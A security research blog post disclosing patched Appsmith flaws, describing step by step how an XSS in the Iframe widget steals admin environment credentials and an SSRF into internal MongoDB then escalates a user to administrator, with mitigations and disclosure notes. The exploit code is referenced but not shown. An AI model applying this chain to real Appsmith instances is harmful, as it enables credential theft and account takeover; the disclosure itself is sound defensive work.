Appsmith Vulnerabilities Can be Chained to Achieve 1-Click Admin Account Takeover

Published:
September 1, 2022
6
min read
Several vulnerabilities in Appsmith (which have now been patched) can be chained to achieve one-click full admin account takeover. Attackers can first exploit an XSS vulnerability to steal internal MongoDB credentials, then exploit an SSRF vulnerability to connect to the internal MongoDB.

Executive Summary

Threat Impact Mitigation
  • Several vulnerabilities in Appsmith (which have now been patched) can be chained to achieve one-click full admin account takeover.
  • Attackers can first exploit an XSS vulnerability to steal internal MongoDB credentials, then exploit an SSRF vulnerability to connect to the internal MongoDB.
  • The XSS vulnerability exposes sensitive auth tokens and credentials in the “/api/v1/admin/env” file from the admin’s account.
  • Using the stolen credentials, the SSRF vulnerability can be exploited to execute insert/update/delete queries on the internal DB.
  • Maintain a whitelist of domains or addresses that your application accesses.
  • The root vulnerabilities in this chain (CVE-2022-38298 and CVE-2022-38299) have been fixed by Appsmith.
  • Update to versions 1.7.12 and above.

 

Proof of Concept

Exfiltration of data through XSS

While navigating the different widgets available in Appsmith, we encountered an widget called Iframe. Using this widget users can insert iframes with arbitrary URLs and srcDoc in their Appsmith dashboards. We observed that the field named srcDoc is vulnerable to XSS.

XSS in srcDoc field
XSS in srcDoc field

The XSS could have been used to steal admin session cookies but the session cookies were marked as HttpOnly and hence are not accessible via Javascript.

Session cookies
Session cookies

Even though we couldn’t gain access to the cookies, we were able to use an iframe to fetch sensitive content from an API endpoint that only administrators have access to. One such endpoint was “/api/v1/admin/env” which contains the environment variables of Appsmith, including infrastructure-related credentials. Any other user apart from the administrator can not access the endpoint.

Environment endpoint not accessible only to the admin
Environment endpoint not accessible only to the admin

Since we have the capability to inject an iframe and execute arbitrary javascript, the admin can be tricked into loading the iframe successfully allowing javascript access to the contents of the iframe.As a proof of concept the following code was injected in the srcDoc field, to insert an iframe that loads the admin environment endpoint and fetches the content of the iframe as soon as it finishes loading. Once the data is exfiltrated, it is sent to the attacker’s VPS where it can be decoded.

Exploit Code for iframe injection and data exfiltration

Once the exploit is ready, it needs to be published so that other users can access it. This can be done by making the Appsmith dashboard public, and can be accessed by anyone.

Sharing the malicious dashboard
Sharing the malicious dashboard

Once the dashboard is published and is available to the public via a link, the link is sent to the administrator. As soon as the administrator clicks the link and views the dashboard, the iframe of the sensitive endpoint is loaded. Then the javascript steals the content of the iframe and sends it to the attacker. Here is how data is received on the attacker’s end when the administrator visits the malicious dashboard.

Data exfiltration on the attacker’s end
Data exfiltration on the attacker’s end

Now, this base64 encoded data can be decoded by the attacker by running the following command:$ echo “<base64_encoded_data>” | base64 –decode

Decoded credentials
Decoded credentials

The decoded MongoDB credentials can be used for further investigation and exploitation.

Access to Internal MongoDB via SSRF

From our previous testing on Appsmith, we know that there are protections that restrict access to the cloud instances' internal metadata but there are no restrictions on the localhost. In addition, Appsmith has a feature which allows users to connect MongoDB as a data source.We then checked if this functionality can be used to connect to the internal MongoDB running on localhost. This was done by filling the connection and authentication details obtained previously into the form which allows users to connect to MongoDB as a data source.

Connecting to Internal MongoDB
Connecting to Internal MongoDB

On clicking on the “Save” option, the data source was added successfully. After which, we were able to view all the collections in the Appsmith database, on the UI.

Collections in the internal MongoDB
Collections in the internal MongoDB

Escalating privileges to Administrator

For each of these collections, it was possible to run the following DB queries

  • INSERT
  • UPDATE
  • DELETE
  • FIND

Out of all the collections, the one named “Users” contains the details of all users on the platform.At this stage there are several ways to escalate privileges to an administrator. It is even possible to modify the admin user password hash or add admin policies to our user. We proceeded by fetching the admin policies from MongoDB, using the FIND command.

Fetching the policies for Admin User
Fetching the policies for Admin User

We found that the administrator account has the following policies associated with it.

"policies": [{"groups": [],"permission": "manage:userWorkspace","users": ["shadowadmin@cloudsek.com"]},{"groups": [],"permission": "read:userWorkspace","users": ["shadowadmin@cloudsek.com"]},{"groups": [],"permission": "read:users","users": ["shadowadmin@cloudsek.com"]},{"groups": [],"permission": "manage:users","users": ["shadowadmin@cloudsek.com"]},{"groups": [],"permission": "manage:instanceEnv","users": ["shadowadmin@cloudsek.com"]}]

Then, using the update command, we updated the policies assigned to our user with the admin policies. On clicking on “RUN” we got a successful response from MongoDB.

Updating the policies of our user using the UPDATE command
Updating the policies of our user using the UPDATE command

Validation

To validate the vulnerability, we logged in to our user account via a different browser and found that it had access to all admin functionalities and permissions to manage users, workspaces, and instances.[caption id="attachment_22172" align="alignnone" width="630"]

Admin settings are accessible by our user
Admin settings are accessible by our user

We tried accessing the endpoint i.e. “/api/v1/admin/env”, which only administrators, and got a successful response from the server.

Able to access admin-only endpoint
Able to access admin-only endpoint

Impact

Attackers can first exploit the XSS vulnerability to steal internal MongoDB credentials, then an SSRF vulnerability can be exploited to connect to internal MongoDB to execute DB queries and achieve full account takeover or privilege escalation.Also, Appsmith does not have a signup restriction in the default installation. So if an Appsmith instance is exposed to the internet, anyone can signup and have access to the vulnerable functionality in which the SSRF vulnerability was discovered.This can have large-scale impact, given that over a 1000 Appsmith instances are exposed on the internet:

Shodan results for public Appsmith instances
Shodan results for public Appsmith instances

Mitigation

  • The root vulnerabilities in this chain (CVE-2022-38298 and CVE-2022-38299) have been fixed by Appsmith
  • Maintain a whitelist of domains or addresses that your application accesses
  • Update to versions 1.7.12 and above.

Responsible Disclosure

CloudSEK submitted this vulnerability to Appsmith via their well-defined vulnerability disclosure process. Subsequently, the Appsmith team fixed this issue in their next release. Appsmith versions 1.7.12 and above do not have this vulnerability.

References

Share this post
Contributors to this Article
Shashank Barthwal
Shashank Barthwal
Shashank is a Cyber Security Analyst at CloudSEK, who is also a security and automation enthusiast. He is especially passionate about coding and bug hunting.
Sparsh Kulshrestha
Sparsh Kulshrestha
Sparsh is a Cyber Security Analyst at CloudSEK. This security professional hunts for points of vulnerability in client domains. He is OSCP certified and a bug bounty hunter who plays CTF for Team UnderDawg.
Deepanjli Paulraj
Deepanjli Paulraj
Deepanjli is CloudSEK's Lead Technical Content Writer and Editor. She is a pen wielding pedant with an insatiable appetite for books, Sudoku, and epistemology. She works on any and all content at CloudSEK, which includes blogs, reports, product documentation, and everything in between.

Join our Newsletter

Sign up so that you don't miss any updates from us

We care about your data in our privacy policy.
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Search

Didn't Find what you are looking for search here